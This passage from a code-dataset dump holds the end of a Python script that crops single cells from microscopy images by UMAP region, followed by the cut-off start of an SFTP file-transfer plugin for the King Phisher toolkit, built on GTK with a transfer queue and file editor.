\"random_rows_for_UMAP.csv\"\n\n# Check if the CSV file already exists\nif os.path.isfile(csv_file_path):\n # Load the existing CSV into a DataFrame\n df = pd.read_csv(csv_file_path)\nelse:\n # Create a new DataFrame if the CSV doesn't exist\n df = pd.DataFrame(\n columns=[\n \"Metadata_cell_type\",\n \"Metadata_treatment\",\n \"Metadata_Plate\",\n \"Metadata_Well\",\n \"Metadata_Site\",\n \"Metadata_Cells_Location_Center_X\",\n \"Metadata_Cells_Location_Center_Y\",\n \"UMAP0\",\n \"UMAP1\",\n ]\n )\n\n\n# ## Read in `yaml` file with settings for each 
\n# In[3]:\n\n\n# load in plate information\ndictionary_path = pathlib.Path(\"./image_settings.yaml\")\nwith open(dictionary_path) as file:\n    cell_info_dictionary = yaml.load(file, Loader=yaml.FullLoader)\n\n# view the dictionary to assess that all info is added correctly\npprint.pprint(cell_info_dictionary, indent=4)\n\n\n# ## Find single cells from each cell type and treatment from UMAP (plate 3)\n\n# In[4]:\n\n\nfor crop_cell, info in cell_info_dictionary.items():\n    # Define the filter conditions\n    condition = (\n        (UMAP_plate3_df['Metadata_cell_type'] == crop_cell.split('-')[0]) &\n        (UMAP_plate3_df['Metadata_treatment'] == crop_cell.split('-')[1]) &\n        (UMAP_plate3_df['UMAP0'].between(info[\"UMAP0\"][0], info[\"UMAP0\"][1])) &\n        (UMAP_plate3_df['UMAP1'].between(info[\"UMAP1\"][0], info[\"UMAP1\"][1]))\n    )\n\n    # Apply the filter\n    filtered_df = UMAP_plate3_df[condition]\n\n    # Select and display only the specific columns\n    selected_columns = [\n        'Metadata_cell_type',\n        'Metadata_treatment',\n        'Metadata_Plate',\n        'Metadata_Well',\n        'Metadata_Site',\n        'Metadata_Cells_Location_Center_X',\n        'Metadata_Cells_Location_Center_Y',\n        'UMAP0',\n        'UMAP1'\n    ]\n\n    filtered_df = filtered_df[selected_columns]\n\n    # Randomly select a row\n    random_row = filtered_df.sample(n=1, random_state=info[\"Random state\"])\n\n    # Add the selected row to the DataFrame (DataFrame.append is deprecated, so use pd.concat)\n    df = pd.concat([df, random_row], ignore_index=True)\n\n    # Assign the direction to the UMAP_direction column for the last added row\n    df.at[df.index[-1], \"UMAP_direction\"] = crop_cell.split('-')[2]\n\n    # Drop any duplicate rows that occur when rerunning this code\n    df.drop_duplicates(inplace=True)\n\n    # Save the updated DataFrame to the CSV file\n    df.to_csv(csv_file_path, index=False)\n\n    # Create a filename based on Metadata_Plate, Metadata_Well, Metadata_Site\n    plate = random_row['Metadata_Plate'].values[0]\n    well = random_row['Metadata_Well'].values[0]\n    site = random_row['Metadata_Site'].values[0]\n\n    # Initialize a list to store file paths\n    file_paths = []\n\n    # Create 5 different file paths with \"d0\" through \"d4\" suffixes\n    for i in range(5):\n        filename = f\"{images_dir}/{plate}_{well}{site}d{i}_illumcorrect.tiff\"\n        file_paths.append(filename)\n\n    print(\"Randomly selected row:\")\n    print(random_row)\n    print(\"Generated filenames:\")\n    for path in file_paths:\n        print(path)\n\n    # Initialize empty lists to store the images for each channel\n    blue_channel = []\n    green_channel = []\n    red_channel = []\n\n    # Iterate through channels from the random well/site and assign the correct file names with the color channel\n    for file_path in file_paths:\n        filename = pathlib.Path(file_path).name\n        if 'd0' in filename:\n            blue_channel_image = cv2.imread(str(file_path), cv2.IMREAD_UNCHANGED)\n            blue_channel.append(blue_channel_image)\n        elif 'd1' in filename:\n            green_channel_image = cv2.imread(str(file_path), cv2.IMREAD_UNCHANGED)\n            green_channel.append(green_channel_image)\n        elif 'd4' in filename:\n            red_channel_image = cv2.imread(str(file_path), cv2.IMREAD_UNCHANGED)\n            red_channel.append(red_channel_image)\n\n    # Stack the images for each channel along the channel axis\n    blue_channel_stack = np.stack(blue_channel, axis=-1)\n    green_channel_stack = np.stack(green_channel, axis=-1)\n    red_channel_stack = np.stack(red_channel, axis=-1)\n\n
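    # Note: each channel below is rescaled by its own maximum, so channel\n    # intensities are stretched to the full range independently and relative\n    # brightness between channels is not preserved.\n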
    # Scale the pixel values to fit within the 16-bit range (0-65535)\n    blue_channel_stack = (blue_channel_stack / np.max(blue_channel_stack) * 65535).astype(np.uint16)\n    green_channel_stack = (green_channel_stack / np.max(green_channel_stack) * 65535).astype(np.uint16)\n    red_channel_stack = (red_channel_stack / np.max(red_channel_stack) * 65535).astype(np.uint16)\n\n    # Create the RGB numpy array by merging the channels\n    composite_image = cv2.merge((red_channel_stack, green_channel_stack, blue_channel_stack)).astype(np.uint16)\n\n    # Path for saving comp images\n    comp_path = pathlib.Path(f\"{comp_dir}/{info['composite_save_path']}\")\n\n    # Save the composite 16-bit RGB tiff image\n    tf.imwrite(comp_path, composite_image)\n\n    # Load the composite image from the save path as an Image object instead of numpy array\n    composite_image = Image.open(comp_path)\n\n    # Get the center coordinates of the selected cell from the randomly chosen row\n    center_x = random_row[\"Metadata_Cells_Location_Center_X\"]\n    center_y = random_row[\"Metadata_Cells_Location_Center_Y\"]\n\n    # Define the size of the cropping box (250x250 pixels)\n    box_size = 250\n\n    # Paths for saving cropped images\n    crop_path = pathlib.Path(f\"{crop_dir}/{info['crop_save_path']}\")\n\n    # Iterate through the center coordinates and crop each cell\n    for x, y in zip(center_x, center_y):\n        left = x - box_size // 2\n        top = y - box_size // 2\n        right = x + box_size // 2\n        bottom = y + box_size // 2\n\n        # Crop the cell\n        cell_image = composite_image.crop((left, top, right, bottom))\n\n        # Save the cropped cell image; a unique name such as the cell's ID or index could be used here\n        cell_image.save(crop_path)\n\n    # Close the composite image\n    composite_image.close()\n\n","repo_name":"WayScience/CFReT_data","sub_path":"4.analyze_data/notebooks/UMAP/nbconverted/2.find_sc.py","file_name":"2.find_sc.py","file_ext":"py","file_size_in_byte":7242,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"5594440054","text":"import collections\nimport logging\nimport os\nimport stat\nimport threading\n\nfrom . import tasks\nfrom . import directory\nfrom . import sftp_utilities\nfrom . import editor\n\nfrom king_phisher.client import gui_utilities\nfrom king_phisher.client.widget import extras\n\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nfrom gi.repository import GdkPixbuf\nfrom gi.repository import GLib\n\nlogger = logging.getLogger('KingPhisher.Plugins.SFTPClient')\n\nclass StatusDisplay(object):\n\t\"\"\"\n\tClass representing the bottom treeview of the GUI. 
This contains the logging\n\tand graphical representation of all queued transfers.\n\t\"\"\"\n\tdef __init__(self, queue):\n\t\tself.queue = queue\n\t\tself.scroll = sftp_utilities.get_object('SFTPClient.notebook.page_stfp.scrolledwindow_transfer_statuses')\n\t\tself.treeview_transfer = sftp_utilities.get_object('SFTPClient.notebook.page_stfp.treeview_transfer_statuses')\n\t\tself._tv_lock = threading.RLock()\n\n\t\tcol_img = Gtk.CellRendererPixbuf()\n\t\tcol = Gtk.TreeViewColumn('')\n\t\tcol.pack_start(col_img, False)\n\t\tcol.add_attribute(col_img, 'pixbuf', 0)\n\t\tself.treeview_transfer.append_column(col)\n\t\tgui_utilities.gtk_treeview_set_column_titles(self.treeview_transfer, ('Local File', 'Remote File', 'Status'), column_offset=1)\n\n\t\tcol_bar = Gtk.TreeViewColumn('Progress')\n\t\tprogress = Gtk.CellRendererProgress()\n\t\tcol_bar.pack_start(progress, True)\n\t\tcol_bar.add_attribute(progress, 'value', 4)\n\t\tcol_bar.set_property('resizable', True)\n\t\tcol_bar.set_min_width(125)\n\t\tself.treeview_transfer.append_column(col_bar)\n\n\t\t# todo: make this a CellRendererBytes\n\t\tgui_utilities.gtk_treeview_set_column_titles(self.treeview_transfer, ('Size',), column_offset=5, renderers=(extras.CellRendererBytes(),))\n\t\tself._tv_model = Gtk.TreeStore(GdkPixbuf.Pixbuf, str, str, str, int, int, object)\n\t\tself.treeview_transfer.connect('size-allocate', self.signal_tv_size_allocate)\n\t\tself.treeview_transfer.connect('button_press_event', self.signal_tv_button_pressed)\n\n\t\tself.treeview_transfer.set_model(self._tv_model)\n\t\tself.treeview_transfer.show_all()\n\n\t\tself.popup_menu = Gtk.Menu.new()\n\n\t\tself.menu_item_paused = Gtk.CheckMenuItem.new_with_label('Paused')\n\t\tmenu_item = self.menu_item_paused\n\t\tmenu_item.connect('toggled', self.signal_menu_toggled_paused)\n\t\tself.popup_menu.append(menu_item)\n\n\t\tself.menu_item_cancel = Gtk.MenuItem.new_with_label('Cancel')\n\t\tmenu_item = self.menu_item_cancel\n\t\tmenu_item.connect('activate', self.signal_menu_activate_cancel)\n\t\tself.popup_menu.append(menu_item)\n\n\t\tmenu_item = Gtk.SeparatorMenuItem()\n\t\tself.popup_menu.append(menu_item)\n\n\t\tmenu_item = Gtk.MenuItem.new_with_label('Clear')\n\t\tmenu_item.connect('activate', self.signal_menu_activate_clear)\n\t\tself.popup_menu.append(menu_item)\n\t\tself.popup_menu.show_all()\n\n\tdef _get_selected_tasks(self):\n\t\ttreepaths = self._get_selected_treepaths()\n\t\tif treepaths is None:\n\t\t\treturn None\n\t\tselected_tasks = set()\n\t\tfor treepath in treepaths:\n\t\t\ttreeiter = self._tv_model.get_iter(treepath)\n\t\t\tselected_tasks.add(self._tv_model[treeiter][6])\n\t\t\tself._tv_model.foreach(lambda _, path, treeiter: selected_tasks.add(self._tv_model[treeiter][6]) if path.is_descendant(treepath) else 0)\n\t\treturn selected_tasks\n\n\tdef _get_selected_treepaths(self):\n\t\tselection = self.treeview_transfer.get_selection()\n\t\tmodel, treeiter = selection.get_selected()\n\t\tif treeiter is None:\n\t\t\treturn None\n\t\ttreepaths = []\n\t\ttreepaths.append(model.get_path(treeiter))\n\t\treturn treepaths\n\n\tdef _change_task_state(self, state_from, state_to):\n\t\tmodified_tasks = []\n\t\twith self.queue.mutex:\n\t\t\tselected_tasks = set([task for task in self._get_selected_tasks() if task.state in state_from])\n\t\t\tfor task in selected_tasks:\n\t\t\t\tmodified_tasks.append(task)\n\t\t\t\tmodified_tasks.extend(task.parents) # ensure parents are also synced because state changes may affect them\n\t\t\t\ttask.state = 
state_to\n\t\tself.sync_view(set(modified_tasks))\n\n\tdef _sync_view(self, sftp_tasks=None):\n\t\t# This value was set to True to prevent the treeview from freezing.\n\t\tif not self.queue.mutex.acquire(blocking=True):\n\t\t\treturn\n\t\tif not self._tv_lock.acquire(blocking=False):\n\t\t\tself.queue.mutex.release()\n\t\t\treturn\n\t\tsftp_tasks = (sftp_tasks or self.queue.queue)\n\t\tfor task in sftp_tasks:\n\t\t\tif not isinstance(task, tasks.TransferTask):\n\t\t\t\tcontinue\n\t\t\tif task.treerowref is None:\n\t\t\t\tparent_treeiter = None\n\t\t\t\tif task.parent:\n\t\t\t\t\tparent_treerowref = task.parent.treerowref\n\t\t\t\t\tif parent_treerowref is None:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tparent_treepath = parent_treerowref.get_path()\n\t\t\t\t\tif parent_treepath is None:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tparent_treeiter = self._tv_model.get_iter(parent_treepath)\n\t\t\t\tdirection = Gtk.STOCK_GO_FORWARD if task.transfer_direction == 'upload' else Gtk.STOCK_GO_BACK\n\t\t\t\timage = self.treeview_transfer.render_icon(direction, Gtk.IconSize.BUTTON, None) if parent_treeiter is None else Gtk.Image()\n\t\t\t\ttreeiter = self._tv_model.append(parent_treeiter, [\n\t\t\t\t\timage,\n\t\t\t\t\ttask.local_path,\n\t\t\t\t\ttask.remote_path,\n\t\t\t\t\ttask.state,\n\t\t\t\t\t0,\n\t\t\t\t\tNone if isinstance(task, tasks.TransferDirectoryTask) else task.size,\n\t\t\t\t\ttask\n\t\t\t\t])\n\t\t\t\ttask.treerowref = Gtk.TreeRowReference.new(self._tv_model, self._tv_model.get_path(treeiter))\n\t\t\telif task.treerowref.valid():\n\t\t\t\trow = self._tv_model[task.treerowref.get_path()] # pylint: disable=unsubscriptable-object\n\t\t\t\trow[3] = task.state\n\t\t\t\trow[4] = task.progress\n\t\tself.queue.mutex.release()\n\t\treturn False\n\n\tdef sync_view(self, sftp_tasks=None):\n\t\tif isinstance(sftp_tasks, tasks.Task):\n\t\t\tsftp_tasks = (sftp_tasks,)\n\t\tGLib.idle_add(self._sync_view, sftp_tasks, priority=GLib.PRIORITY_DEFAULT_IDLE)\n\n\tdef signal_menu_activate_clear(self, _):\n\t\twith self.queue.mutex:\n\t\t\tfor task in list(self.queue.queue):\n\t\t\t\tif not task.is_done:\n\t\t\t\t\tcontinue\n\t\t\t\tif task.treerowref is not None and task.treerowref.valid():\n\t\t\t\t\tself._tv_model.remove(self._tv_model.get_iter(task.treerowref.get_path()))\n\t\t\t\t\ttask.treerowref = None\n\t\t\t\tself.queue.queue.remove(task)\n\t\t\tself.queue.not_full.notify()\n\n\tdef signal_menu_toggled_paused(self, _):\n\t\tif self.menu_item_paused.get_active():\n\t\t\tself._change_task_state(('Active', 'Pending', 'Transferring'), 'Paused')\n\t\telse:\n\t\t\tself._change_task_state(('Paused',), 'Pending')\n\n\tdef signal_menu_activate_cancel(self, _):\n\t\tself._change_task_state(('Active', 'Paused', 'Pending', 'Transferring'), 'Cancelled')\n\n\tdef signal_tv_button_pressed(self, _, event):\n\t\tif event.button == Gdk.BUTTON_SECONDARY:\n\t\t\tselected_tasks = self._get_selected_tasks()\n\t\t\tif not selected_tasks:\n\t\t\t\tself.menu_item_cancel.set_sensitive(False)\n\t\t\t\tself.menu_item_paused.set_sensitive(False)\n\t\t\telse:\n\t\t\t\tself.menu_item_cancel.set_sensitive(True)\n\t\t\t\tself.menu_item_paused.set_sensitive(True)\n\t\t\t\ttasks_are_paused = [task.state == 'Paused' for task in selected_tasks]\n\t\t\t\tif any(tasks_are_paused):\n\t\t\t\t\tself.menu_item_paused.set_active(True)\n\t\t\t\t\tself.menu_item_paused.set_inconsistent(not 
all(tasks_are_paused))\n\t\t\t\telse:\n\t\t\t\t\tself.menu_item_paused.set_active(False)\n\t\t\t\t\tself.menu_item_paused.set_inconsistent(False)\n\t\t\tself.popup_menu.popup(None, None, None, None, event.button, Gtk.get_current_event_time())\n\t\t\treturn True\n\t\treturn\n\n\tdef signal_tv_size_allocate(self, _, event, data=None):\n\t\tadj = self.scroll.get_vadjustment()\n\t\tadj.set_value(0)\n\nclass FileManager(object):\n\t\"\"\"\n\tFile manager that manages the transfer queue by adding new tasks and\n\thandling queued tasks, and that handles communication between all the\n\tother classes.\n\t\"\"\"\n\tdef __init__(self, application, ssh, config):\n\t\tself.application = application\n\t\tself.config = config\n\t\tself.queue = tasks.TaskQueue()\n\t\tself._threads = []\n\t\tself._threads_max = 1\n\t\tself._threads_shutdown = threading.Event()\n\t\tfor _ in range(self._threads_max):\n\t\t\tthread = threading.Thread(target=self._thread_routine)\n\t\t\tthread.start()\n\t\t\tself._threads.append(thread)\n\t\tself.editor = None\n\t\tself.window = sftp_utilities.get_object('SFTPClient.window')\n\t\tself.notebook = sftp_utilities.get_object('SFTPClient.notebook')\n\t\tself.notebook.set_show_tabs(False)\n\t\tself.notebook.connect('switch-page', self.signal_change_page)\n\t\tself.editor_tab_save_button = sftp_utilities.get_object('SFTPClient.notebook.page_editor.toolbutton_save_html_file')\n\t\tself.editor_tab_save_button.set_sensitive(False)\n\t\tself.editor_tab_save_button.connect('clicked', self.signal_editor_save)\n\t\tself.status_display = StatusDisplay(self.queue)\n\t\tself.local = directory.LocalDirectory(self.application, config)\n\t\tself.remote = directory.RemoteDirectory(self.application, config, ssh)\n\t\tsftp_utilities.get_object('SFTPClient.notebook.page_stfp.button_upload').connect('button-press-event', lambda widget, event: self._queue_transfer_from_selection(tasks.UploadTask))\n\t\tsftp_utilities.get_object('SFTPClient.notebook.page_stfp.button_download').connect('button-press-event', lambda widget, event: self._queue_transfer_from_selection(tasks.DownloadTask))\n\t\tself.local.menu_item_transfer.connect('activate', lambda widget: self._queue_transfer_from_selection(tasks.UploadTask))\n\t\tself.remote.menu_item_transfer.connect('activate', lambda widget: self._queue_transfer_from_selection(tasks.DownloadTask))\n\t\tself.local.menu_item_edit.connect('activate', self.signal_edit_file, self.local)\n\t\tself.remote.menu_item_edit.connect('activate', self.signal_edit_file, self.remote)\n\t\tmenu_item = sftp_utilities.get_object('SFTPClient.notebook.page_stfp.menuitem_opts_transfer_hidden')\n\t\tmenu_item.set_active(self.config['transfer_hidden'])\n\t\tmenu_item.connect('toggled', self.signal_toggled_config_option, 'transfer_hidden')\n\t\tmenu_item = sftp_utilities.get_object('SFTPClient.notebook.page_stfp.menuitem_opts_show_hidden')\n\t\tmenu_item.set_active(self.config['show_hidden'])\n\t\tmenu_item.connect('toggled', self.signal_toggled_config_option_show_hidden)\n\t\tmenu_item = sftp_utilities.get_object('SFTPClient.notebook.page_stfp.menuitem_exit')\n\t\tmenu_item.connect('activate', lambda _: self.window.destroy())\n\t\tself.window.connect('destroy', self.signal_window_destroy)\n\t\tself.window.show_all()\n\n\tdef signal_change_page(self, _, __, page_number):\n\t\t\"\"\"\n\t\tCheck whether the page change is from the editor to the sftp view, and then ask the user whether they\n\t\twant to save detected changes. 
If yes, it hands off to the editor save routine to take action.\n\t\t\"\"\"\n\t\t# page_number is the page switched from\n\t\tif page_number:\n\t\t\treturn\n\t\tif not self.editor_tab_save_button.is_sensitive():\n\t\t\treturn\n\t\tif not gui_utilities.show_dialog_yes_no('Changes not saved', self.application.get_active_window(), 'Do you want to save your changes?'):\n\t\t\treturn\n\n\t\tself._save_editor_file()\n\n\tdef signal_edit_file(self, _, directory):\n\t\t\"\"\"\n\t\tHandles the signal when edit is selected on a file.\n\n\t\t:param _: Gtkmenuitem unused\n\t\t:param directory: The local or remote directory\n\t\t\"\"\"\n\t\tselection = directory.treeview.get_selection()\n\t\tmodel, treeiter = selection.get_selected()\n\t\ttry:\n\t\t\tfile_path = directory.get_abspath(model[treeiter][2])\n\t\texcept TypeError:\n\t\t\tlogger.warning('no file selected to edit')\n\t\t\treturn\n\n\t\tself.editor = editor.SFTPEditor(self.application, file_path, directory)\n\t\tself._load_editor_file()\n\n\tdef signal_editor_save(self, _):\n\t\tself._save_editor_file()\n\n\tdef _save_editor_file(self):\n\t\t\"\"\"\n\t\tHandles the save file action for the editor instance when the button is pressed or when tabs are changed.\n\t\t\"\"\"\n\t\tif not self.editor:\n\t\t\tself.editor_tab_save_button.set_sensitive(False)\n\t\t\tself.notebook.set_current_page(0)\n\t\t\tself.notebook.set_show_tabs(False)\n\t\t\treturn\n\n\t\tbuffer_contents = self.editor.sourceview_buffer.get_text(\n\t\t\tself.editor.sourceview_buffer.get_start_iter(),\n\t\t\tself.editor.sourceview_buffer.get_end_iter(),\n\t\t\tFalse\n\t\t)\n\t\tif buffer_contents == self.editor.file_contents:\n\t\t\tlogger.debug('editor found nothing to save')\n\t\t\tself.editor_tab_save_button.set_sensitive(False)\n\t\t\treturn\n\n\t\tbuffer_contents = buffer_contents.encode('utf-8')\n\n\t\ttry:\n\t\t\tself.editor.directory.write_file(self.editor.file_path, buffer_contents)\n\t\t\tself.editor.file_contents = buffer_contents\n\t\t\tlogger.info(\"saved editor contents to {} file path {}\".format(self.editor.file_location, self.editor.file_path))\n\t\texcept IOError:\n\t\t\tlogger.warning(\"could not write to {} file: {}\".format(self.editor.file_location, self.editor.file_path))\n\t\t\tself.editor_tab_save_button.set_sensitive(False)\n\t\t\tgui_utilities.show_dialog_error(\n\t\t\t\t'Permission Denied',\n\t\t\t\tself.application.get_active_window(),\n\t\t\t\t\"Cannot write to {} file\".format(self.editor.file_location)\n\t\t\t)\n\t\t\treturn\n\t\tself.editor_tab_save_button.set_sensitive(False)\n\n\tdef _load_editor_file(self):\n\t\t\"\"\"\n\t\tUsed to get and load the file contents of the SFTPEditor instance,\n\t\tand handle any errors found during the process.\n\t\t\"\"\"\n\t\tif not self.editor:\n\t\t\treturn\n\n\t\ttry:\n\t\t\tfile_contents = self.editor.directory.read_file(self.editor.file_path)\n\t\t\tfile_contents = file_contents.decode('utf-8')\n\t\texcept IOError:\n\t\t\tlogger.warning(\"cannot read {} file {}\".format(self.editor.file_location, self.editor.file_path))\n\t\t\tgui_utilities.show_dialog_error(\n\t\t\t\t'Permission Denied',\n\t\t\t\tself.application.get_active_window(),\n\t\t\t\t\"Cannot read {} file\".format(self.editor.file_location)\n\t\t\t)\n\t\t\treturn\n\t\texcept UnicodeDecodeError:\n\t\t\tlogger.warning(\"could not decode content of {} file {}\".format(self.editor.file_location, self.editor.file_path))\n\t\t\tgui_utilities.show_dialog_error(\n\t\t\t\t'Error decoding file',\n\t\t\t\tself.application.get_active_window(),\n\t\t\t\t'Can only edit utf-8 
encoded file types.'\n\t\t\t)\n\t\t\treturn\n\n\t\tif isinstance(file_contents, bytes):\n\t\t\ttry:\n\t\t\t\tfile_contents = file_contents.decode('utf-8')\n\t\t\texcept UnicodeDecodeError:\n\t\t\t\tlogger.warning(\"could not decode content of {} file {}\".format(self.editor.file_location, self.editor.file_path))\n\t\t\t\tgui_utilities.show_dialog_error(\n\t\t\t\t\t'Error decoding file',\n\t\t\t\t\tself.application.get_active_window(),\n\t\t\t\t\t'Can only edit utf-8 encoded file types.'\n\t\t\t\t)\n\t\t\t\treturn\n\n\t\tself.notebook.set_show_tabs(True)\n\t\tself.editor.load_file(file_contents)\n\t\tself.notebook.set_current_page(1)\n\n\tdef signal_toggled_config_option(self, menuitem, config_key):\n\t\tself.config[config_key] = menuitem.get_active()\n\n\tdef signal_toggled_config_option_show_hidden(self, menuitem):\n\t\tself.config['show_hidden'] = menuitem.get_active()\n\t\tself.local.refilter()\n\t\tself.remote.refilter()\n\n\tdef _transfer_dir(self, task):\n\t\ttask.state = 'Transferring'\n\t\tif isinstance(task, tasks.DownloadTask):\n\t\t\tdst, dst_path = self.local, task.local_path\n\t\telif isinstance(task, tasks.UploadTask):\n\t\t\tdst, dst_path = self.remote, task.remote_path\n\t\telse:\n\t\t\traise ValueError('task_cls must be a subclass of TransferTask')\n\t\tif not stat.S_ISDIR(dst.path_mode(dst_path)):\n\t\t\tdst.make_dir(dst_path)\n\n\t\tif not task.size:\n\t\t\ttask.state = 'Completed'\n\n\tdef _transfer_file(self, task, chunk=0x1000):\n\t\ttask.state = 'Transferring'\n\t\tself.status_display.sync_view(task)\n\t\tftp = self.remote.ftp_acquire()\n\t\twrite_mode = 'ab+' if task.transferred > 0 else 'wb+'\n\t\tif isinstance(task, tasks.UploadTask):\n\t\t\tsrc_file_h = open(task.local_path, 'rb')\n\t\t\tdst_file_h = ftp.file(task.remote_path, write_mode)\n\t\telif isinstance(task, tasks.DownloadTask):\n\t\t\tsrc_file_h = ftp.file(task.remote_path, 'rb')\n\t\t\tdst_file_h = open(task.local_path, write_mode)\n\t\telse:\n\t\t\tself.remote.ftp_release()\n\t\t\traise ValueError('unsupported task type passed to _transfer_file')\n\t\tself.remote.ftp_release()\n\t\tsrc_file_h.seek(task.transferred)\n\t\ttry:\n\t\t\twhile task.transferred < task.size:\n\t\t\t\tif self._threads_shutdown.is_set():\n\t\t\t\t\ttask.state = 'Cancelled'\n\t\t\t\tif task.state != 'Transferring':\n\t\t\t\t\tbreak\n\t\t\t\ttemp = src_file_h.read(chunk)\n\t\t\t\tdst_file_h.write(temp)\n\t\t\t\ttask.transferred += chunk\n\t\t\t\tself.status_display.sync_view(task)\n\t\texcept Exception as error:\n\t\t\traise error\n\t\tfinally:\n\t\t\tsrc_file_h.close()\n\t\t\tdst_file_h.close()\n\t\tif task.state == 'Cancelled':\n\t\t\tif isinstance(task, tasks.UploadTask):\n\t\t\t\tself.remote.remove_by_file_name(task.remote_path)\n\t\t\telif isinstance(task, tasks.DownloadTask):\n\t\t\t\tself.local.remove_by_file_name(task.local_path)\n\t\telif task.state != 'Paused':\n\t\t\ttask.state = 'Completed'\n\t\t\tGLib.idle_add(self._idle_refresh_directories)\n\n\tdef _idle_refresh_directories(self):\n\t\tself.local.refresh()\n\t\tself.remote.refresh()\n\n\tdef _thread_routine(self):\n\t\twhile not self._threads_shutdown.is_set():\n\t\t\ttask = self.queue.get()\n\t\t\tif isinstance(task, tasks.ShutdownTask):\n\t\t\t\tlogger.info('processing task: ' + str(task))\n\t\t\t\ttask.state = 'Completed'\n\t\t\t\tself.queue.remove(task)\n\t\t\t\tbreak\n\t\t\telif isinstance(task, tasks.TransferTask):\n\t\t\t\tlogger.debug('processing task: ' + str(task))\n\t\t\t\ttry:\n\t\t\t\t\tif isinstance(task, 
tasks.TransferDirectoryTask):\n\t\t\t\t\t\tself._transfer_dir(task)\n\t\t\t\t\telse:\n\t\t\t\t\t\tself._transfer_file(task)\n\t\t\t\texcept Exception:\n\t\t\t\t\tlogger.error(\"unknown error processing task: {0!r}\".format(task), exc_info=True)\n\t\t\t\t\tif not task.is_done:\n\t\t\t\t\t\ttask.state = 'Error'\n\t\t\t\t\t\tfor parent in task.parents:\n\t\t\t\t\t\t\tparent.state = 'Error'\n\t\t\t\tself.status_display.sync_view([task] + task.parents)\n\n\tdef signal_window_destroy(self, _):\n\t\tself.window.set_sensitive(False)\n\t\tself._threads_shutdown.set()\n\t\tfor _ in self._threads:\n\t\t\tself.queue.put(tasks.ShutdownTask())\n\t\tfor thread in self._threads:\n\t\t\tthread.join()\n\t\tself.local.shutdown()\n\t\tself.remote.shutdown()\n\t\tdirectories = self.config.get('directories', {})\n\t\tdirectories['local'] = {\n\t\t\t'current': self.local.cwd,\n\t\t\t'history': list(self.local.wd_history)\n\t\t}\n\t\tif 'remote' not in directories:\n\t\t\tdirectories['remote'] = {}\n\t\tdirectories['remote'][self.application.config['server'].split(':', 1)[0]] = list(self.remote.wd_history)\n\t\tself.config['directories'] = directories\n\t\tself.editor = None\n\t\tsftp_utilities._gtk_objects = {}\n\t\tsftp_utilities._builder = None\n\n\tdef _queue_transfer_from_selection(self, task_cls):\n\t\tselection = self.local.treeview.get_selection()\n\t\tmodel, treeiter = selection.get_selected()\n\t\tlocal_path = self.local.cwd if treeiter is None else model[treeiter][2]\n\t\tif local_path is None:\n\t\t\tlogger.warning('can not queue a transfer when the local path is unspecified')\n\t\t\treturn\n\n\t\tselection = self.remote.treeview.get_selection()\n\t\tmodel, treeiter = selection.get_selected()\n\t\tremote_path = self.remote.cwd if treeiter is None else model[treeiter][2]\n\t\tif remote_path is None:\n\t\t\tlogger.warning('can not queue a transfer when the remote path is unspecified')\n\t\t\treturn\n\n\t\tif issubclass(task_cls, tasks.DownloadTask):\n\t\t\tsrc_path, dst_path = remote_path, local_path\n\t\telif issubclass(task_cls, tasks.UploadTask):\n\t\t\tsrc_path, dst_path = local_path, remote_path\n\t\telse:\n\t\t\traise ValueError('task_cls must be a subclass of TransferTask')\n\t\tself.queue_transfer(task_cls, src_path, dst_path)\n\n\tdef queue_transfer(self, task_cls, src_path, dst_path):\n\t\tif issubclass(task_cls, tasks.DownloadTask):\n\t\t\tsrc, dst = self.remote, self.local\n\t\telif issubclass(task_cls, tasks.UploadTask):\n\t\t\tsrc, dst = self.local, self.remote\n\t\telse:\n\t\t\traise ValueError('task_cls must be a subclass of TransferTask')\n\t\tif dst.get_is_folder(dst_path):\n\t\t\tdst_path = dst.path_mod.join(dst_path, src.path_mod.basename(src_path))\n\t\tif src.get_is_folder(src_path):\n\t\t\tself._queue_dir_transfer(task_cls, src_path, dst_path)\n\t\telse:\n\t\t\tself._queue_file_transfer(task_cls, src_path, dst_path)\n\n\tdef _queue_file_transfer(self, task_cls, src_path, dst_path):\n\t\t\"\"\"\n\t\tHandles the file transfer by stopping bad transfers, creating tasks for\n\t\ttransfers, and placing them in the queue.\n\n\t\t:param task_cls: The type of task the transfer will be.\n\t\t:param str src_path: The source path to be uploaded or downloaded.\n\t\t:param str dst_path: The destination path to be created and data transferred into.\n\t\t\"\"\"\n\t\tif issubclass(task_cls, tasks.DownloadTask):\n\t\t\tif not os.access(os.path.dirname(dst_path), os.W_OK):\n\t\t\t\tgui_utilities.show_dialog_error(\n\t\t\t\t\t'Permission 
Denied',\n\t\t\t\t\tself.application.get_active_window(),\n\t\t\t\t\t'Cannot write to the destination folder.'\n\t\t\t\t)\n\t\t\t\treturn\n\t\t\tlocal_path, remote_path = self.local.get_abspath(dst_path), self.remote.get_abspath(src_path)\n\t\telif issubclass(task_cls, tasks.UploadTask):\n\t\t\tif not os.access(src_path, os.R_OK):\n\t\t\t\tgui_utilities.show_dialog_error(\n\t\t\t\t\t'Permission Denied',\n\t\t\t\t\tself.application.get_active_window(),\n\t\t\t\t\t'Cannot read the source file.'\n\t\t\t\t)\n\t\t\t\treturn\n\t\t\tlocal_path, remote_path = self.local.get_abspath(src_path), self.remote.get_abspath(dst_path)\n\t\tfile_task = task_cls(local_path, remote_path)\n\t\tif isinstance(file_task, tasks.UploadTask):\n\t\t\tfile_size = self.local.get_file_size(local_path)\n\t\telif isinstance(file_task, tasks.DownloadTask):\n\t\t\tfile_size = self.remote.get_file_size(remote_path)\n\t\tfile_task.size = file_size\n\t\tself.queue.put(file_task)\n\t\tself.status_display.sync_view(file_task)\n\n\tdef _queue_dir_transfer(self, task_cls, src_path, dst_path):\n\t\t\"\"\"\n\t\tHandles the folder transfer by stopping bad transfers, creating tasks\n\t\tfor transfers, and placing them in the queue.\n\n\t\t:param task_cls: The type of task the transfer will be.\n\t\t:param str src_path: The path to be uploaded or downloaded.\n\t\t:param str dst_path: The path to be created.\n\t\t\"\"\"\n\t\tif issubclass(task_cls, tasks.DownloadTask):\n\t\t\tsrc, dst = self.remote, self.local\n\t\t\tif not os.access(dst.path_mod.dirname(dst_path), os.W_OK):\n\t\t\t\tgui_utilities.show_dialog_error('Permission Denied', self.application.get_active_window(), 'Can not write to the destination directory.')\n\t\t\t\treturn\n\t\t\ttask = task_cls.dir_cls(dst_path, src_path, size=0)\n\t\telif issubclass(task_cls, 